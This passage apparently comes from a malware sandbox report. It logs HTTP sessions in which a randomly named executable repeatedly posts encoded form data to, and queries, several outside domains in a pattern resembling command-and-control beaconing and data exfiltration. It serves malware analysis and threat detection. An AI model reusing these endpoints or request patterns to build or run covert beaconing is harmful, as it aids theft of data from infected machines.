                                                                                                              Data Ascii: document.shtml port 80 on Tuesday, 05-Nov-2024 09:35:49 EST"> WebMaster</a>. </section> <p class="reason-text">The server cannot find the requested page:</p> </div> <section class="additional-info">
Nov 5, 2024 15:35:49.238061905 CET  11                 IN         Data Raw: 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: ml>0


Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
29          192.168.11.20  49770        45.150.55.15    80                4732  C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
Timestamp                           Bytes transferred  Direction  Data
Nov 5, 2024 15:35:55.488802910 CET  717                OUT        POST /yg1w/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 201
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.983743.vin
                                                                                                              Origin: http://www.983743.vin
                                                                                                              Referer: http://www.983743.vin/yg1w/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Nov 5, 2024 15:35:55.808893919 CET  314                IN         HTTP/1.1 404 Not Found
                                                                                                              Server: nginx
                                                                                                              Date: Tue, 05 Nov 2024 14:35:55 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Content-Encoding: gzip


Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
30          192.168.11.20  49771        45.150.55.15    80                4732  C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
Timestamp                           Bytes transferred  Direction  Data
Nov 5, 2024 15:35:58.329834938 CET  737                OUT        POST /yg1w/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 221
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.983743.vin
                                                                                                              Origin: http://www.983743.vin
                                                                                                              Referer: http://www.983743.vin/yg1w/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Nov 5, 2024 15:35:58.640630007 CET  314                IN         HTTP/1.1 404 Not Found
                                                                                                              Server: nginx
                                                                                                              Date: Tue, 05 Nov 2024 14:35:58 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Content-Encoding: gzip


Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
31          192.168.11.20  49772        45.150.55.15    80                4732  C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
Timestamp                           Bytes transferred  Direction  Data
Nov 5, 2024 15:36:01.174194098 CET  2578               OUT        POST /yg1w/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 7369
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.983743.vin
                                                                                                              Origin: http://www.983743.vin
                                                                                                              Referer: http://www.983743.vin/yg1w/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Nov 5, 2024 15:36:01.486511946 CET  314                IN         HTTP/1.1 404 Not Found
                                                                                                              Server: nginx
                                                                                                              Date: Tue, 05 Nov 2024 14:36:01 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Content-Encoding: gzip


Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
32          192.168.11.20  49773        45.150.55.15    80                4732  C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
Timestamp                           Bytes transferred  Direction  Data
Nov 5, 2024 15:36:04.022237062 CET  454                OUT        GET /yg1w/?Q2_4=B/h41wdzKHxv2H2J8JkNr9NyFguRLdtCgIEX5jqCPHbFCbPf8ZDAyvcb9g9cRq9SizS8TlHunVk6R9fe76EcgvsehxPtxmeCiZqIleDJmBUfq+mqOPWirkU=&uXP=1HX8 HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-us
                                                                                                              Connection: close
                                                                                                              Host: www.983743.vin
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Nov 5, 2024 15:36:04.342394114 CET  330                IN         HTTP/1.1 404 Not Found
                                                                                                              Server: nginx
                                                                                                              Date: Tue, 05 Nov 2024 14:36:04 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
33          192.168.11.20  49774        50.19.214.227   80                4732  C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
Timestamp                           Bytes transferred  Direction  Data
Nov 5, 2024 15:36:09.638406992 CET  735                OUT        POST /ppmq/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 201
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.parkerstraus.dev
                                                                                                              Origin: http://www.parkerstraus.dev
                                                                                                              Referer: http://www.parkerstraus.dev/ppmq/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Nov 5, 2024 15:36:09.771873951 CET  1240               IN         HTTP/1.1 404 Not Found
                                                                                                              Content-Type: text/html
                                                                                                              Date: Tue, 05 Nov 2024 14:36:09 GMT
                                                                                                              Server: Netlify
                                                                                                              X-Nf-Request-Id: 01JBYC29JXT9Z7D0083Z51WAZ4
                                                                                                              Connection: close
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Data Ascii: 9b5<!doctype html><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no"><title>Site Not Found</title><style>:root{--colorDefaultTextColor:#A3A9AC;--colorDefaultTextColorCard:#2D3B41;--colorBgApp:rgb(14, 30, 37);--colorBgInverse:hsl(175, 48%, 98%);--colorTextMuted:rgb(100, 110, 115);--colorError:#D32254;--colorBgCard:#fff;--colorShadow:#0e1e251f;--colorErrorText:rgb(142, 11, 48);--colorCardTitleCard:#2D3B41;--colorStackText:#222;--colorCodeText:#F5F5F5}body{font-family:-apple-system,BlinkMacSystemFont,segoe ui,Roboto,Helvetica,Arial,sans-serif,apple color emoji,segoe ui emoji,segoe ui symbol;background:#34383c;color:#fff;overflow:hidden;margin:0;padding:0;font-size:1rem;line-height:1.5}h1{margin:0;font-size:1.375rem;line-height:1.2}.main{position:relative;display:flex;flex-direction:column;align-items:center;justify-content:center;height:100vh;width:100vw}.card{position:relative;display:flex;flex-direction:column;width:75%;max-width: [TRUNCATED]
Nov 5, 2024 15:36:09.771974087 CET  1240               IN
                                                                                                              Data Ascii: fff;color:#0e1e25;border-radius:8px;box-shadow:0 2px 4px rgba(14,30,37,.16)}a{margin:0;font-weight:600;line-height:24px;color:#054861}a svg{position:relative;top:2px}a:hover,a:focus{text-decoration:none}a:hover svg path{fill:#007067}p:last-of-
Nov 5, 2024 15:36:09.771981001 CET  504                IN
                                                                                                              Data Ascii: urce=404page&utm_campaign=community_tracking">"page not found" support guide</a>for troubleshooting tips.<p style=color:var(--colorTextMuted)>Netlify Internal ID:<span class="inline-code request-id"><code>11b01JBYC29JXT9Z7D0083Z51WAZ4</c


Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
34          192.168.11.20  49775        50.19.214.227   80                4732  C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
Timestamp                           Bytes transferred  Direction  Data
Nov 5, 2024 15:36:12.281435966 CET  755                OUT        POST /ppmq/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 221
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.parkerstraus.dev
                                                                                                              Origin: http://www.parkerstraus.dev
                                                                                                              Referer: http://www.parkerstraus.dev/ppmq/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Nov 5, 2024 15:36:12.408978939 CET | 1240 | IN | HTTP/1.1 404 Not Found
                                                                                                              Content-Type: text/html
                                                                                                              Date: Tue, 05 Nov 2024 14:36:12 GMT
                                                                                                              Server: Netlify
                                                                                                              X-Nf-Request-Id: 01JBYC2C5EK6FZCGARX881VH00
                                                                                                              Connection: close
                                                                                                              Transfer-Encoding: chunked


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              35 | 192.168.11.20 | 49776 | 50.19.214.227 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              Nov 5, 2024 15:36:14.921763897 CET | 2480 | OUT | POST /ppmq/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 7369
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.parkerstraus.dev
                                                                                                              Origin: http://www.parkerstraus.dev
                                                                                                              Referer: http://www.parkerstraus.dev/ppmq/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Nov 5, 2024 15:36:15.055460930 CET | 1240 | IN | HTTP/1.1 404 Not Found
                                                                                                              Content-Type: text/html
                                                                                                              Date: Tue, 05 Nov 2024 14:36:15 GMT
                                                                                                              Server: Netlify
                                                                                                              X-Nf-Request-Id: 01JBYC2ER0S7X9JQPQV0N533C2
                                                                                                              Connection: close
                                                                                                              Transfer-Encoding: chunked


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              36 | 192.168.11.20 | 49777 | 50.19.214.227 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              Nov 5, 2024 15:36:17.560540915 CET | 460 | OUT | GET /ppmq/?uXP=1HX8&Q2_4=KRVOuqNXYxyDgODQvejwfHP1kSw7YgglxTu2jlorf4EUTkuZz6rgp0sXDkV2rkGK77WHny3VDG/xcSWz2Ew3DtXH4m1AMWH2WLdk5ansbP7qCtZCj8eJzNQ= HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-us
                                                                                                              Connection: close
                                                                                                              Host: www.parkerstraus.dev
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Nov 5, 2024 15:36:17.668472052 CET | 1240 | IN | HTTP/1.1 404 Not Found
                                                                                                              Content-Type: text/html
                                                                                                              Date: Tue, 05 Nov 2024 14:36:17 GMT
                                                                                                              Server: Netlify
                                                                                                              X-Nf-Request-Id: 01JBYC2HAE3FKS9CP1QGCY05CR
                                                                                                              Connection: close
                                                                                                              Transfer-Encoding: chunked


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              37 | 192.168.11.20 | 49778 | 13.248.169.48 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              Nov 5, 2024 15:36:22.908857107 CET | 732 | OUT | POST /sws3/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 201
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.mynotebook.shop
                                                                                                              Origin: http://www.mynotebook.shop
                                                                                                              Referer: http://www.mynotebook.shop/sws3/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              38 | 192.168.11.20 | 49779 | 13.248.169.48 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              Nov 5, 2024 15:36:25.545689106 CET | 752 | OUT | POST /sws3/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 221
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.mynotebook.shop
                                                                                                              Origin: http://www.mynotebook.shop
                                                                                                              Referer: http://www.mynotebook.shop/sws3/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              39 | 192.168.11.20 | 49780 | 13.248.169.48 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              Nov 5, 2024 15:36:28.186302900 CET | 2578 | OUT | POST /sws3/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 7369
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.mynotebook.shop
                                                                                                              Origin: http://www.mynotebook.shop
                                                                                                              Referer: http://www.mynotebook.shop/sws3/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Nov 5, 2024 15:36:28.186389923 CET | 5323 | OUT


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              40 | 192.168.11.20 | 49781 | 13.248.169.48 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              Nov 5, 2024 15:36:30.833393097 CET | 459 | OUT | GET /sws3/?Q2_4=nV4LnquDqwBlA07HQ+G/v4eHjjrt+T2QZG3593DoQvpPwtJ1qSvdLT+tAqFoiYkQqMds5fxc5qEgqBHWhT8GH/u4GJVId9VOA+wH6Rzyb1bp8I1+ufyyCcg=&uXP=1HX8 HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-us
                                                                                                              Connection: close
                                                                                                              Host: www.mynotebook.shop
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Nov 5, 2024 15:36:30.944552898 CET | 389 | IN | HTTP/1.1 200 OK
                                                                                                              Server: openresty
                                                                                                              Date: Tue, 05 Nov 2024 14:36:30 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 249
                                                                                                              Connection: close
                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Q2_4=nV4LnquDqwBlA07HQ+G/v4eHjjrt+T2QZG3593DoQvpPwtJ1qSvdLT+tAqFoiYkQqMds5fxc5qEgqBHWhT8GH/u4GJVId9VOA+wH6Rzyb1bp8I1+ufyyCcg=&uXP=1HX8"}</script></head></html>


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              41 | 192.168.11.20 | 49782 | 13.248.169.48 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              Nov 5, 2024 15:36:44.367878914 CET | 723 | OUT | POST /zut6/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 201
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.notepad.mobi
                                                                                                              Origin: http://www.notepad.mobi
                                                                                                              Referer: http://www.notepad.mobi/zut6/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Ascii: Q2_4=HvQKTny6ndbB8whrY850gcQw68egj92mtsSRsixFdbRajAR/rFM+QykauCtllKivIu4MAoOFRyCKK+bvWSw4HP9shjAdtr0s+rk+OxSH/a0PLsggIOd9DqfisCTgT84/HXZypGAfTwMNkA23OYA0oZWr4YpRxt0C8f2h1RDXrkL1jIrydXbxDF2bek7iWQbSag==


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              42 | 192.168.11.20 | 49783 | 13.248.169.48 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              Nov 5, 2024 15:36:47.011559963 CET | 743 | OUT | POST /zut6/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 221
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.notepad.mobi
                                                                                                              Origin: http://www.notepad.mobi
                                                                                                              Referer: http://www.notepad.mobi/zut6/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Ascii: Q2_4=HvQKTny6ndbBuBRrZax0m8Q/msegx93OtseRsjFsctpaii5/oAg+Rykakitg9qikIu17AtuFRx+KK/rvWBInE/9u9jAlnL0s+rk+OxWp/asPKf4gKrx6cafl7yTgEs47HXZApDpCTy0NkBm3Os0ziZWX24o0itcO996j5WzQznDer+6oAlvVAWqpaUCKUSaJHoZvb1YACP23XhxAa5+oI08=


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              43 | 192.168.11.20 | 49784 | 13.248.169.48 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              Nov 5, 2024 15:36:49.650089025 CET | 6445 | OUT | POST /zut6/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 7369
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.notepad.mobi
                                                                                                              Origin: http://www.notepad.mobi
                                                                                                              Referer: http://www.notepad.mobi/zut6/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Nov 5, 2024 15:36:49.650146961 CET | 1447 | OUT


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              44 | 192.168.11.20 | 49785 | 13.248.169.48 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              Nov 5, 2024 15:36:52.288631916 CET | 456 | OUT | GET /zut6/?Q2_4=Kt4qQSLgj4HorxpxZIZ4p+EAwKHWi+XN9OiBuCBJU5cikXkc2Sk5R2gtgSdO+P2tW+5SfoOeVCvwWIOnLXM8QNp6yDsCjrxQ3ZxiPCiDnoMvdK5RCpNRC70=&uXP=1HX8 HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-us
                                                                                                              Connection: close
                                                                                                              Host: www.notepad.mobi
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Nov 5, 2024 15:36:52.399775028 CET | 389 | IN | HTTP/1.1 200 OK
                                                                                                              Server: openresty
                                                                                                              Date: Tue, 05 Nov 2024 14:36:52 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 249
                                                                                                              Connection: close
                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Q2_4=Kt4qQSLgj4HorxpxZIZ4p+EAwKHWi+XN9OiBuCBJU5cikXkc2Sk5R2gtgSdO+P2tW+5SfoOeVCvwWIOnLXM8QNp6yDsCjrxQ3ZxiPCiDnoMvdK5RCpNRC70=&uXP=1HX8"}</script></head></html>


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              45 | 192.168.11.20 | 49786 | 15.197.148.33 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              Nov 5, 2024 15:37:06.821808100 CET | 717 | OUT | POST /7sxb/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 201
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.hyman.life
                                                                                                              Origin: http://www.hyman.life
                                                                                                              Referer: http://www.hyman.life/7sxb/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Ascii: Q2_4=gPQJC/t92ciV31RrtzxnCOecIAacHwlbeHtg4WVIYdVcFTGwCkIyudwblofyYuwQkFlPsnNkbWF71jatxE2NIBWounndzAUDpGD30x0zDCBoCKMCmuq4KY4u32S/BbL+IYkBJe8WBffcqfd+ykxXRVwVEtMQkY1NrY/8XnjBn9xSdQNdapjFVstfUPdmdvdzlQ==


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              46 | 192.168.11.20 | 49787 | 15.197.148.33 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              Nov 5, 2024 15:37:09.471915960 CET | 737 | OUT | POST /7sxb/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 221
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.hyman.life
                                                                                                              Origin: http://www.hyman.life
                                                                                                              Referer: http://www.hyman.life/7sxb/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Ascii: Q2_4=gPQJC/t92ciVxVBr+DNnAuefUQacegkzeGRg4U5YZuhcEy2wDlIyvdwbwYf3HewZkFZhsmxkbWR71m+txy+SJRWqnHnD9gUDpGD30xgZDCZoB5kC37W/JY4t02S/FbLiIYkjJa8wBZTcqaZ+z1xUbVwTAtNBgIohqrnrdkfqp999YGcHHbXhW/xtQ/kOftco4aUTxvq1sZtWevX+QRpWE7I=


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              47 | 192.168.11.20 | 49788 | 15.197.148.33 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              Nov 5, 2024 15:37:12.112953901 CET | 2578 | OUT | POST /7sxb/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 7369
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.hyman.life
                                                                                                              Origin: http://www.hyman.life
                                                                                                              Referer: http://www.hyman.life/7sxb/
